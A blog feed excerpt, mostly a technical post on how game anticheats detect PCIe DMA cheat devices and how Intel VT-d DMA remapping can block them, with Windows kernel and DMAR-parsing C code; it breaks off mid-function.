<p>This doesn’t mean Apple Intelligence is fully secure, as it still relies on API calls to notorious AI firms like OpenAI, which <a target="_blank" href="https://theconversation.com/openais-data-hunger-raises-privacy-concerns-237448">has been known to be very data hungry</a>. Fortunately, Apple always asks before your requests are sent to non-Apple entities, and these features can be turned off, unlike other <a target="_blank" href="https://www.theregister.com/2024/06/03/windows_11_recall_on_default/">recently shoehorned AI systems</a>. Apple also has a history of compromising the security of its server infrastructure to comply with national regulations in countries like <a target="_blank" href="https://www.nytimes.com/2021/05/17/technology/apple-china-censorship-data.html">Mainland China</a>.</p>
<p>The thing is that if your mind is already made up on this technology, and you know who you are, then all of these attempts are likely to be unconvincing for you. For you, Apple has also given the option to completely <a target="_blank" href="https://support.apple.com/guide/iphone/introducing-apple-intelligence-iphc28624b81/ios#:~:text=To%20deactivate%20Apple%20Intelligence%20during,button%20next%20to%20Apple%20Intelligence.">disable Apple Intelligence</a>. Apple also gives <a target="_blank" href="https://support.apple.com/en-us/120320#:~:text=We%20do%20not%20use%20our,publicly%20available%20on%20the%20internet.">guidelines</a> on how to set <code>robots.txt</code> parameters to stop your data from being scraped by Applebot (Apple’s web scraper) and how to request to opt out of training entirely.</p>
<p>The thing I want to underscore is that I do believe the oversimplification and subsequent demonization of AI technologies is dangerous, because it’s the same technology that’s responsible for everything from helping me <a target="_blank" href="https://machinelearning.apple.com/research/recognizing-people-photos">remember my vacation with my family from three years ago</a> to <a target="_blank" href="https://www.lunit.io/en/products/mmg">the early detection of breast cancer</a>. We should encourage research and development into how to integrate these technologies in a better and safer way, not ban them outright.</p>
]]></content:encoded></item><item><title><![CDATA[Mitigating DMA Attacks Through Redirected Address Tables]]></title><description><![CDATA[Cover Illustration by buruberrii_

In a previous blog post, i talk briefly about the many methods on how anticheat systems like Vanguard protect against different type of cheating attempts. One of the methods discussed was the detection of malicious ...]]></description><link>https://research.meekolab.com/mitigating-dma-attacks-through-redirected-address-tables</link><guid isPermaLink="true">https://research.meekolab.com/mitigating-dma-attacks-through-redirected-address-tables</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 13 Nov 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1735377532949/1890d720-03a5-47a3-a576-f8129d7890f1.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> <a target="_blank" href="https://x.com/buruberrii_">buruberrii_</a></p>
</blockquote>
<p>In a <a target="_blank" href="https://research.meekolab.com/understanding-kernel-level-anticheats-in-online-games">previous blog post</a>, I talked briefly about the many methods anticheat systems like Vanguard use to protect against different types of cheating attempts. One of the methods discussed was the detection of malicious PCIe devices. This method has been in the news lately as of writing due to the game “Delta Force”, whose anticheat, Tencent’s AntiCheat Expert (ACE), has caught flak over <a target="_blank" href="https://web.archive.org/web/20241206022251/https://store.steampowered.com/news/app/2507950/view/4476110736154691091">its overly aggressive detection of DMA and USB devices</a>. But what is DMA and why are live service games so against it?</p>
<p>The detection of malicious PCIe devices is crucial due to the advent of hardware-based Direct Memory Access (DMA) cheats. One of the earliest examples of such a device could be the Game Genie, which physically interfaces with the game cartridge and the console, enabling it to alter data at the memory level. Nowadays, PCIe-based DMA devices can be bought online, like this LynxDMA + KMBox set for $160 with free express shipping.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1732807210851/803514e4-e1b5-45ad-b250-cba1a42ced73.jpeg" alt class="image--center mx-auto" /></p>
<p>As many anticheats used to monitor only for malicious processes inside the kernel, DMA devices allow the cheating to happen outside of the main PC hardware. PCIe cards like the LynxDMA enable direct interaction with a computer's memory by interfacing directly with the system's memory bus, facilitating efficient data movement between memory and peripherals.</p>
<p>Many users also add a keyboard and mouse emulator (KMBox), a programmable USB development board that functions as a keyboard and mouse controller. It allows users to run scripts directly on the device's CPU, giving ordinary keyboards and mice programmable macro functions without the need for additional drivers or DLL injection, which ensures that scripts operate independently of the host PC.</p>
<h1 id="heading-current-detection-methods">Current Detection Methods</h1>
<p>Refreshing from our previous escapades, every PCI device has a set of registers commonly referred to as the PCI configuration space. In modern PCI-e devices, an extended configuration space is implemented, which is mapped into the main memory, allowing the system to read/write to the registers. The configuration space consists of a standard header containing information such as the DeviceID, VendorID, Status, and other details.</p>
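<p>To make the header layout concrete, here is a small user-mode C sketch that pulls the first four 16-bit fields out of a raw configuration space dump. The offsets follow the standard PCI header (Vendor ID at 0x00, Device ID at 0x02, Command at 0x04, Status at 0x06); the struct and function names are made up for illustration and are not part of any Windows API.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Byte offsets within the standard PCI configuration header. */
#define CFG_VENDOR_ID 0x00
#define CFG_DEVICE_ID 0x02
#define CFG_COMMAND   0x04
#define CFG_STATUS    0x06

/* Hypothetical container for the fields we care about. */
typedef struct {
    uint16_t vendor_id;
    uint16_t device_id;
    uint16_t command;
    uint16_t status;
} pci_ids;

/* Configuration space is little-endian, so assemble fields byte by byte. */
static uint16_t cfg_le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] &lt;&lt; 8));
}

/* Returns 0 on success, -1 if the dump is too short or no device is present. */
int parse_pci_header(const uint8_t *cfg, size_t len, pci_ids *out)
{
    assert(cfg != NULL &amp;&amp; out != NULL);

    if (len &lt; 8)
        return -1;

    out-&gt;vendor_id = cfg_le16(cfg + CFG_VENDOR_ID);
    out-&gt;device_id = cfg_le16(cfg + CFG_DEVICE_ID);
    out-&gt;command   = cfg_le16(cfg + CFG_COMMAND);
    out-&gt;status    = cfg_le16(cfg + CFG_STATUS);

    /* A vendor ID of 0xFFFF means nothing answered at this address. */
    if (out-&gt;vendor_id == 0xFFFF)
        return -1;

    return 0;
}
</code></pre>
<p>Feeding it a dump that starts with the bytes <code>EE 10 66 06</code> yields a vendor ID of <code>0x10EE</code> and a device ID of <code>0x0666</code>, which is exactly the kind of pair a blacklist would compare against.</p>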
<p>This configuration space allows querying important information from PCI devices within the device tree using the <code>IRP_MN_READ_CONFIG</code> code, which reads from a PCI device's configuration space.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">ValidatePciDevices</span><span class="hljs-params">()</span>
</span>{
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    status = EnumeratePciDeviceObjects(PciDeviceQueryCallback, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"EnumeratePciDeviceObjects failed with status %x"</span>, status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Windows splits <code>DEVICE_OBJECT</code>s into two main categories: Physical Device Objects (PDOs) and Functional Device Objects (FDOs). A PDO represents a device connected to a physical bus and has an associated <code>DEVICE_NODE</code>. In contrast, an FDO represents the device’s functionality and defines how the system interacts with that device in the driver stack. A bus driver such as <code>pci.sys</code> creates one PDO for every device it enumerates on the bus, so to access each PCI device on the system, the anti-cheat system can enumerate all device objects owned by <code>pci.sys</code> and keep only the PDOs.</p>
<p>We first retrieve the driver object associated with the PCI driver (<code>pci.sys</code>), then enumerate all device objects managed by this driver and store them in an array. For each device object, we check whether it is a valid Physical Device Object (PDO) by calling the <code>IsDeviceObjectValidPdo</code> function. If it is a valid PDO, the callback routine (<code>PciDeviceQueryCallback</code>) is invoked.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">EnumeratePciDeviceObjects</span><span class="hljs-params">(_In_ PCI_DEVICE_CALLBACK CallbackRoutine,
                          _In_opt_ PVOID           Context)</span>
</span>{
    NTSTATUS        status             = STATUS_UNSUCCESSFUL;
    UNICODE_STRING  pci                = RTL_CONSTANT_STRING(<span class="hljs-string">L"\\Driver\\pci"</span>);
    PDRIVER_OBJECT  pci_driver_object  = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT* pci_device_objects = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT  current_device     = <span class="hljs-literal">NULL</span>;
    UINT32          pci_device_objects_count = <span class="hljs-number">0</span>;

    status = GetDriverObjectByDriverName(&amp;pci, &amp;pci_driver_object);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetDriverObjectByDriverName failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    status = EnumerateDriverObjectDeviceObjects(
        pci_driver_object, &amp;pci_device_objects, &amp;pci_device_objects_count);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"EnumerateDriverObjectDeviceObjects failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; pci_device_objects_count; index++) {
        current_device = pci_device_objects[index];

        <span class="hljs-comment">/* make sure we have a valid PDO */</span>
        <span class="hljs-keyword">if</span> (!IsDeviceObjectValidPdo(current_device)) {
            ObDereferenceObject(current_device);
            <span class="hljs-keyword">continue</span>;
        }

        status = CallbackRoutine(current_device, Context);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
            DEBUG_ERROR(
                <span class="hljs-string">"EnumeratePciDeviceObjects CallbackRoutine failed with status %x"</span>,
                status);

        ObDereferenceObject(current_device);
    }

    <span class="hljs-keyword">if</span> (pci_device_objects)
        ExFreePoolWithTag(pci_device_objects, POOL_TAG_HW);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Then we read the device's configuration space, starting from the <code>PCI_VENDOR_ID_OFFSET</code>, and store this data in a <code>PCI_COMMON_HEADER</code> structure. The read itself is performed with an IRP carrying the <code>IRP_MN_READ_CONFIG</code> minor code.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">PciDeviceQueryCallback</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject, _In_opt_ PVOID Context)</span>
</span>{
    UNREFERENCED_PARAMETER(Context);

    NTSTATUS          status = STATUS_UNSUCCESSFUL;
    PCI_COMMON_HEADER header = {<span class="hljs-number">0</span>};

    status = QueryPciDeviceConfigurationSpace(
        DeviceObject, PCI_VENDOR_ID_OFFSET, &amp;header, <span class="hljs-keyword">sizeof</span>(PCI_COMMON_HEADER));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"QueryPciDeviceConfigurationSpace failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">if</span> (IsPciConfigurationSpaceFlagged(&amp;header)) {
        DEBUG_VERBOSE(<span class="hljs-string">"Flagged DeviceID found. Device: %llx, DeviceId: %lx"</span>,
                      (UINT64)DeviceObject,
                      header.DeviceID);
        ReportBlacklistedPcieDevice(DeviceObject, &amp;header);
    }
    <span class="hljs-keyword">else</span> {
        DEBUG_VERBOSE(<span class="hljs-string">"Device: %llx, DeviceID: %lx, VendorID: %lx"</span>,
                      (UINT64)DeviceObject,
                      header.DeviceID,
                      header.VendorID);
    }

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>To perform the read, we build an IRP (I/O Request Packet) that targets the configuration space of the PCI device and send it to the device. We then wait for the IRP to complete and return the status of the operation.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">QueryPciDeviceConfigurationSpace</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject,
                                 _In_ UINT32         Offset,
                                 _Out_opt_ PVOID     Buffer,
                                 _In_ UINT32         BufferLength)</span>
</span>{
    NTSTATUS           status = STATUS_UNSUCCESSFUL;
    KEVENT             event  = {<span class="hljs-number">0</span>};
    IO_STATUS_BLOCK    io     = {<span class="hljs-number">0</span>};
    PIRP               irp    = <span class="hljs-literal">NULL</span>;
    PIO_STACK_LOCATION packet = <span class="hljs-literal">NULL</span>;

    <span class="hljs-keyword">if</span> (BufferLength == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_BUFFER_TOO_SMALL;

    KeInitializeEvent(&amp;event, NotificationEvent, FALSE);

    <span class="hljs-comment">/*
     * IO manager will free this IRP when the request is completed
     */</span>
    irp = IoBuildSynchronousFsdRequest(
        IRP_MJ_PNP, DeviceObject, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, &amp;event, &amp;io);

    <span class="hljs-keyword">if</span> (!irp) {
        DEBUG_ERROR(<span class="hljs-string">"IoBuildSynchronousFsdRequest failed with no status."</span>);
        <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
    }

    packet                = IoGetNextIrpStackLocation(irp);
    packet-&gt;MinorFunction = IRP_MN_READ_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.WhichSpace = PCI_WHICHSPACE_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.Offset     = Offset;
    packet-&gt;Parameters.ReadWriteConfig.Buffer     = Buffer;
    packet-&gt;Parameters.ReadWriteConfig.Length     = BufferLength;

    status = IoCallDriver(DeviceObject, irp);

    <span class="hljs-keyword">if</span> (status == STATUS_PENDING) {
        KeWaitForSingleObject(&amp;event, Executive, KernelMode, FALSE, <span class="hljs-literal">NULL</span>);
        status = io.Status;
    }

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"Failed to read configuration space with status %x"</span>,
                    status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Once the configuration space is read, we can check if the device ID is among the flagged IDs. If the device ID matches any of the flagged IDs, we can report the blacklisted device.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN
<span class="hljs-title">IsPciConfigurationSpaceFlagged</span><span class="hljs-params">(_In_ PPCI_COMMON_HEADER Configuration)</span>
</span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; FLAGGED_DEVICE_ID_COUNT; index++) {
        <span class="hljs-keyword">if</span> (Configuration-&gt;DeviceID == FLAGGED_DEVICE_IDS[index])
            <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<p>Now if you think hard, you might realize that there are a lot of peripherals that use PCIe, such as network cards, Thunderbolt devices, and many more. You will also be correct in guessing that blacklisting certain PCIe configuration space signatures has led to many side effects, including disconnecting <a target="_blank" href="https://www.reddit.com/r/ValorantTechSupport/comments/14ehqs9/valorant_make_my_internet_disconnects_once_i_open/">PCIe-based network cards</a>, <a target="_blank" href="https://www.reddit.com/r/ValorantTechSupport/comments/wx1j3w/valorant_turning_off_my_sound_card/">PCIe-based DACs</a>, and even <a target="_blank" href="https://www.reddit.com/r/ValorantTechSupport/comments/1ghpdki/valorant_disconnects_my_laptops_usbc_port_dock/">Thunderbolt docks</a>. This is predictable because PCIe DMA cheating devices sometimes share PCIe controllers with legitimate hardware. This is primarily why I hate anticheat systems: they presume guilt at all times and treat everyone as a threat actor.</p>
<h1 id="heading-vt-d-support-for-dma-remapping">VT-d Support for DMA Remapping</h1>
<p>Previously, we talked about the <a target="_blank" href="https://research.meekolab.com/the-basics-of-intel-vt-x-extensions">basics of Intel’s VT-x extensions</a> and how to use them to make a very basic virtual machine. While VT-x is the hardware feature to enable CPU virtualization, VT-d handles I/O virtualization, allowing direct assignment of physical devices (like GPUs or network cards) to virtual machines while maintaining isolation between them.</p>
<p>One of the main features of VT-d is its support for DMA remapping. At its core, DMA remapping introduces an I/O Memory Management Unit (IOMMU) that intercepts all DMA requests before they reach system memory, enforcing strict access controls and performing necessary address translations through dedicated I/O page tables.</p>
<p>In traditional virtualization without DMA remapping, direct device assignment to virtual machines poses significant security risks. When a device initiates DMA operations, it uses physical addresses, and without remapping capabilities, these devices could potentially access any physical memory location in the system. This unrestricted access creates a critical vulnerability where a compromised device or malicious driver in one VM could read or write to memory regions belonging to other VMs or the hypervisor itself, completely bypassing the CPU's memory protection mechanisms.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1732810510115/a11b7e83-09c3-4a1c-93c0-32752825ed52.jpeg" alt class="image--center mx-auto" /></p>
<p>DMA remapping solves this fundamental security challenge by introducing a hardware-enforced isolation layer. The IOMMU maintains separate I/O page tables for each device or group of devices, similar to how the CPU's MMU uses page tables for process isolation. When a device initiates a DMA operation, the IOMMU performs address translation using these I/O page tables, converting the addresses used by the device (guest physical addresses in virtualization contexts) into actual system physical addresses. This translation process ensures that devices can only access memory regions explicitly mapped in their assigned I/O page tables.</p>
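<p>The translation step can be pictured with a deliberately tiny model. The C sketch below uses a single-level table of 16 pages instead of the real multi-level I/O page tables, and every name in it (<code>toy_io_page_table</code>, <code>toy_iommu_translate</code>) is invented for illustration. It only demonstrates the idea that a DMA request is either translated through the device's own table or blocked.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

#define TOY_PAGE_SHIFT 12u
#define TOY_PAGE_SIZE  (1ull &lt;&lt; TOY_PAGE_SHIFT)
#define TOY_PAGES      16u

#define TOY_READ  0x1u
#define TOY_WRITE 0x2u

/* One table per device (or device group); a toy stand-in for I/O page tables. */
typedef struct {
    uint64_t host_page[TOY_PAGES]; /* host physical page frame for each device page */
    uint8_t  perms[TOY_PAGES];     /* TOY_READ / TOY_WRITE bits, 0 means unmapped */
} toy_io_page_table;

/*
 * Translate a device-visible address into a host physical address.
 * Returns false to model a DMA request that the IOMMU blocks.
 */
bool toy_iommu_translate(const toy_io_page_table *pt, uint64_t dev_addr,
                         bool is_write, uint64_t *host_addr)
{
    assert(pt != NULL &amp;&amp; host_addr != NULL);

    uint64_t page = dev_addr &gt;&gt; TOY_PAGE_SHIFT;
    uint8_t  need = is_write ? TOY_WRITE : TOY_READ;

    /* Outside the table: the device was never given this address range. */
    if (page &gt;= TOY_PAGES)
        return false;

    /* Unmapped page, or mapped without the permission this access needs. */
    if ((pt-&gt;perms[page] &amp; need) == 0)
        return false;

    *host_addr = (pt-&gt;host_page[page] &lt;&lt; TOY_PAGE_SHIFT) |
                 (dev_addr &amp; (TOY_PAGE_SIZE - 1));
    return true;
}
</code></pre>
<p>With device page 2 mapped read-only to host frame <code>0x1234</code>, a read of <code>0x2abc</code> resolves to <code>0x1234abc</code>, while a write to the same address or any access to an unmapped page is rejected.</p>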
<p>Modern virtualization platforms leverage DMA remapping to implement sophisticated I/O virtualization features. For instance, in SR-IOV (Single Root I/O Virtualization) configurations, a single physical device can present multiple Virtual Functions (VFs), each assigned to different VMs. DMA remapping ensures that each VF can only access memory regions allocated to its respective VM, preventing cross-VM memory access violations. The hypervisor programs the IOMMU with separate I/O page tables for each VF, establishing strict memory boundaries that are enforced in hardware.</p>
<p>There are also OS-level mechanisms like Windows Kernel DMA Protection, but these operate within the confines of the operating system's security model: the operating system decides which devices get remapped or blocked, and drivers have to opt in to DMA remapping. While they can provide adequate protection under normal circumstances, they inherently trust the operating system's integrity and depend on proper driver behavior. Because the protection relies on each driver cooperating and on the operating system validating it, there are multiple potential points of failure.</p>
<p>The performance characteristics of hardware-based DMA protection significantly differ from software solutions. VT-d includes dedicated Translation Lookaside Buffers (TLBs) for caching frequently used address translations, minimizing the performance impact of protection checks. The hardware implementation allows DMA operations to proceed at near-native speed once translations are cached. Software-based solutions, conversely, must intercept and validate DMA operations through driver code execution, potentially introducing variable latency and CPU overhead.</p>
<h1 id="heading-implementation">Implementation</h1>
<p>The main idea for this implementation comes from <a target="_blank" href="https://standa-note.blogspot.com/2020/05/introductory-study-of-iommu-vt-d-and.html?m=1">this blog</a> from tandasat, and <a target="_blank" href="https://github.com/cutecatsandvirtualmachines/DmaProtect">this PoC</a> from cutecatsandvirtualmachines. We begin with the initialization of DMA remapping structures, which are discovered through ACPI tables - specifically the DMAR (DMA Remapping) table for Intel systems. The <code>ProcessDmarTable</code> function is responsible for parsing the DMAR ACPI table.</p>
<pre><code class="lang-c"><span class="hljs-function">EFI_STATUS <span class="hljs-title">ProcessDmarTable</span><span class="hljs-params">(
    IN EFI_ACPI_DMAR_HEADER* DmarTable,
    IN OUT DMAR_UNIT_INFORMATION* DmarUnits,
    IN UINT64 MaxDmarUnitCount,
    OUT UINT64* DetectedUnitCount)</span></span>
</code></pre>
<p>The function begins with a crucial security check using <code>MmIsAddressValid</code> to verify that the DMAR table pointer resides in valid memory space. This is essential because ACPI tables could potentially be tampered with, and accessing invalid memory could lead to system crashes or security vulnerabilities.</p>
<pre><code class="lang-c">{
    <span class="hljs-keyword">if</span> (!MmIsAddressValid(DmarTable)) {
        DbgMsg(<span class="hljs-string">"[VT-d] DMAR table ptr is invalid: %p"</span>, DmarTable);
        <span class="hljs-keyword">return</span> STATUS_NOT_MAPPED_DATA;
    }
</code></pre>
<p>The DMAR table traversal is implemented through pointer arithmetic and structure casting. Here, <code>Add2Ptr</code> calculates the end address of the DMAR table using the table's length field. The <code>DmarTable + 1</code> operation skips past the main header to the first remapping structure. This arithmetic assumes the table's length field can be trusted, which is normally the case because the ACPI subsystem validated the table during boot.</p>
<pre><code class="lang-c">endOfDmar = (UINT64)Add2Ptr(DmarTable, DmarTable-&gt;Header.Length);
dmarHeader = (EFI_ACPI_DMAR_STRUCTURE_HEADER*)(DmarTable + <span class="hljs-number">1</span>);
</code></pre>
<p>The main processing loop identifies DMA Remapping Hardware Unit Definition (DRHD) structures by checking the type field. Each DRHD structure describes a remapping hardware unit capable of DMA transaction remapping. The type <code>EFI_ACPI_DMAR_TYPE_DRHD</code> specifically indicates a hardware definition structure, as opposed to other DMAR structure types like Reserved Memory Regions (RMRR) or Root Port ATS Capability (ATSR).</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (dmarHeader-&gt;Type == EFI_ACPI_DMAR_TYPE_DRHD)
</code></pre>
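<p>The traversal described above can be sketched in user mode over a plain byte buffer. The layout constants reflect my reading of the DMAR format (a 48-byte table header, then structures that each start with a 16-bit type and a 16-bit length, with the DRHD register base at offset 8), so treat them as assumptions to verify against the VT-d specification. The function and helper names are invented, and the extra length checks are my addition rather than something taken from the PoC.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

#define DMAR_HEADER_SIZE 48u /* ACPI header (36) + host address width, flags, reserved */
#define DMAR_TYPE_DRHD   0u
#define DRHD_MIN_SIZE    16u /* type, length, flags, size, segment, register base */

static uint16_t dmar_le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] &lt;&lt; 8));
}

static uint64_t dmar_le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i &gt;= 0; --i)
        v = (v &lt;&lt; 8) | p[i];
    return v;
}

/*
 * Walk the remapping structures and collect DRHD register base addresses.
 * Returns how many DRHD structures were seen, which may exceed max_bases;
 * only the first max_bases entries are written.
 */
size_t find_drhd_bases(const uint8_t *table, size_t table_len,
                       uint64_t *bases, size_t max_bases)
{
    assert(table != NULL &amp;&amp; bases != NULL);

    size_t found = 0;
    size_t off   = DMAR_HEADER_SIZE;

    while (off + 4 &lt;= table_len) {
        uint16_t type = dmar_le16(table + off);
        uint16_t len  = dmar_le16(table + off + 2);

        /* A zero or oversized length would loop forever or run off the table. */
        if (len &lt; 4 || len &gt; table_len - off)
            break;

        if (type == DMAR_TYPE_DRHD &amp;&amp; len &gt;= DRHD_MIN_SIZE) {
            if (found &lt; max_bases)
                bases[found] = dmar_le64(table + off + 8);
            found++;
        }

        off += len;
    }

    return found;
}
</code></pre>
<p>Returning the total count rather than stopping at <code>max_bases</code> lets the caller tell "buffer was large enough" apart from "too many units", which mirrors the bounded discovery in the original function.</p>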
<p>For each discovered unit, the function reads two critical capability registers. The Capability Register (CAP_REG) contains fundamental features like supported address widths and caching requirements. The Extended Capability Register (ECAP_REG) describes advanced features like interrupt remapping, queued invalidation support, and page-walk coherency capabilities. These are read using memory-mapped I/O operations, as the registers live in a memory-mapped register block whose base address is reported by the DRHD structure rather than in PCI configuration space.</p>
<pre><code class="lang-c">DmarUnits[discoveredUnitCount].Capability.Uint64 =
    CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_CAP_REG);
DmarUnits[discoveredUnitCount].ExtendedCapability.Uint64 =
    CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_ECAP_REG);
</code></pre>
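<p>Once the two 64-bit values are read, individual features are just bit fields. The following C sketch decodes a handful of them. The bit positions (ND in CAP[2:0], CM in CAP[7], SAGAW in CAP[12:8], MGAW in CAP[21:16], and QI, IR, PT in ECAP bits 1, 3, and 6) are taken from my reading of the VT-d specification and should be checked against the revision you target; the <code>vtd_caps</code> struct and function names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Hypothetical decoded view of a few CAP_REG / ECAP_REG fields. */
typedef struct {
    unsigned domains_encoded;     /* CAP[2:0]   ND, encoded number of domains */
    bool     caching_mode;        /* CAP[7]     CM */
    unsigned sagaw;               /* CAP[12:8]  supported address width bitmap */
    unsigned max_guest_addr_bits; /* CAP[21:16] MGAW, stored as width minus one */
    bool     queued_invalidation; /* ECAP[1]    QI */
    bool     interrupt_remapping; /* ECAP[3]    IR */
    bool     pass_through;        /* ECAP[6]    PT */
} vtd_caps;

/* Extract `width` bits starting at bit `lo`. */
static uint64_t vtd_bits(uint64_t value, unsigned lo, unsigned width)
{
    assert(width &gt; 0 &amp;&amp; width &lt; 64);
    return (value &gt;&gt; lo) &amp; ((1ull &lt;&lt; width) - 1);
}

vtd_caps decode_vtd_caps(uint64_t cap, uint64_t ecap)
{
    vtd_caps c;

    c.domains_encoded     = (unsigned)vtd_bits(cap, 0, 3);
    c.caching_mode        = vtd_bits(cap, 7, 1) != 0;
    c.sagaw               = (unsigned)vtd_bits(cap, 8, 5);
    c.max_guest_addr_bits = (unsigned)vtd_bits(cap, 16, 6) + 1;
    c.queued_invalidation = vtd_bits(ecap, 1, 1) != 0;
    c.interrupt_remapping = vtd_bits(ecap, 3, 1) != 0;
    c.pass_through        = vtd_bits(ecap, 6, 1) != 0;

    return c;
}

/* SAGAW bit 2 advertises 4-level (48-bit) second-level page tables. */
bool supports_4_level_tables(const vtd_caps *c)
{
    assert(c != NULL);
    return (c-&gt;sagaw &amp; (1u &lt;&lt; 2)) != 0;
}
</code></pre>
<p>A check like <code>supports_4_level_tables</code> matters here because the page table hierarchy built later assumes four levels, so a unit that only advertises a different width would need a different layout.</p>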
<p>The function implements bounded discovery through <code>MaxDmarUnitCount</code>. This prevents buffer overflows in the <code>DmarUnits</code> array while allowing for systems with multiple remapping units. The zero initialization of <code>DmarUnits</code> using <code>RtlZeroMemory</code> ensures that any unused entries remain in a known state. We then zero out the register base address after reading to prevent potential reuse of the address by malicious code that might later access the DMAR table in memory.</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (discoveredUnitCount &lt; MaxDmarUnitCount)
    {
       EFI_ACPI_DMAR_DRHD_HEADER* dmarUnit;

        dmarUnit = (EFI_ACPI_DMAR_DRHD_HEADER*)dmarHeader;
        DmarUnits[discoveredUnitCount].RegisterBasePa = dmarUnit-&gt;RegisterBaseAddress;

        DmarUnits[discoveredUnitCount].Capability.Uint64 =
            CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_CAP_REG);
        DmarUnits[discoveredUnitCount].ExtendedCapability.Uint64 =
            CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_ECAP_REG);

        dmarUnit-&gt;RegisterBaseAddress = <span class="hljs-number">0</span>;
    }
</code></pre>
<p>The function's error handling covers three cases:</p>
<ol>
<li><p>Invalid DMAR table pointer (initial check)</p>
</li>
<li><p>No units discovered (<code>discoveredUnitCount == 0</code>)</p>
</li>
<li><p>Too many units discovered (<code>discoveredUnitCount &gt; MaxDmarUnitCount</code>)</p>
</li>
</ol>
<p>Each failure case returns a specific status code that allows the caller to handle the error appropriately.</p>
<ul>
<li><p><code>STATUS_UNSUCCESSFUL</code>: No units found</p>
<pre><code class="lang-c">      <span class="hljs-keyword">if</span> (discoveredUnitCount == <span class="hljs-number">0</span>)
      {
          DbgMsg(<span class="hljs-string">"[VT-d] No DMA remapping hardware unit found"</span>);
          <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
      }
</code></pre>
</li>
<li><p><code>STATUS_RESOURCE_NOT_OWNED</code>: Too many units</p>
<pre><code class="lang-c">      <span class="hljs-keyword">if</span> (discoveredUnitCount &gt; MaxDmarUnitCount)
      {
          DbgMsg(<span class="hljs-string">"[VT-d] Too many DMA remapping hardware units found (%llu)"</span>,
              discoveredUnitCount);
          <span class="hljs-keyword">return</span> STATUS_RESOURCE_NOT_OWNED;
      }
</code></pre>
</li>
</ul>
<p>The implementation establishes a four-level page table hierarchy for DMA address translation, mirroring the structure used by modern x86-64 CPU memory management. This hierarchy is initialized through the <code>BuildPassthroughTranslations</code> function, which creates an identity mapping for all PCI devices up to 512GB of physical memory. The function meticulously constructs root tables, context tables, and second-level page tables.</p>
<pre><code class="lang-c"><span class="hljs-function">VOID <span class="hljs-title">BuildPassthroughTranslations</span><span class="hljs-params">(OUT DMAR_TRANSLATIONS* Translations)</span>
</span>{
    VTD_ROOT_ENTRY defaultRootValue;
    VTD_CONTEXT_ENTRY defaultContextValue;
